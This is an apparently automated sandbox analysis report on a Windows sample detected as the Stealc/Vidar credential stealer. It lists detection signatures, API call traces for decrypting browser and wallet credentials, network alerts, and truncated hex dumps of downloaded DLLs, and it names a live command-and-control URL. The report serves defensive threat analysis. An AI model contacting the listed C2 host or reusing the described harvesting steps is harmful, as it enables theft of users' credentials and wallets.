Windows Analysis Report
5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe

Overview

General Information

Sample name: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
Analysis ID: 1538409
MD5: 217e6aff108174a9a90022c19f8e5f8f
SHA1: a46822575426c3fac79c55f9cf9f8adb907ec58b
SHA256: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717ceebaa28e2f865471e6
Tags: exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Found malware configuration
Source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://147.45.44.221/28166bd28a5d19e6.php", "Botnet": "nfzeonwcituc"}
Source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://147.45.44.221/28166bd28a5d19e6.php", "Botnet": "nfzeonwcituc"}
Multi AV Scanner detection for submitted file
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe ReversingLabs: Detection: 52%
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Virustotal: Detection: 54% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02759B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 1_2_02759B60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02757240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 1_2_02757240
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02759AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_02759AC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02768EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 1_2_02768EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275C820 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 1_2_0275C820
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_6C806C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 1_2_6C806C80
Uses 32bit PE files
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: BitLockerToGo.pdb source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: BitLockerToGo.pdbGCTL source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 1_2_0275BE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_027516D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0275F6B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02763EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_02763EA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0275DA80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0275E430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02764910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_02764910
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0275DE10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_027638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 1_2_027638B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_02764570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 1_2_02764570
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0275ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0275ED20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 147.45.44.221:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49732 -> 147.45.44.221:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 147.45.44.221:80 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49732 -> 147.45.44.221:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.44.221:80 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49732 -> 147.45.44.221:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49732 -> 147.45.44.221:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://147.45.44.221/28166bd28a5d19e6.php
Source: Malware configuration extractor URLs: http://147.45.44.221/28166bd28a5d19e6.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 12:30:30 GMTETag: "10e436-5e7ed3ec64580"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "a7550-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "94750-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "6dde8-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 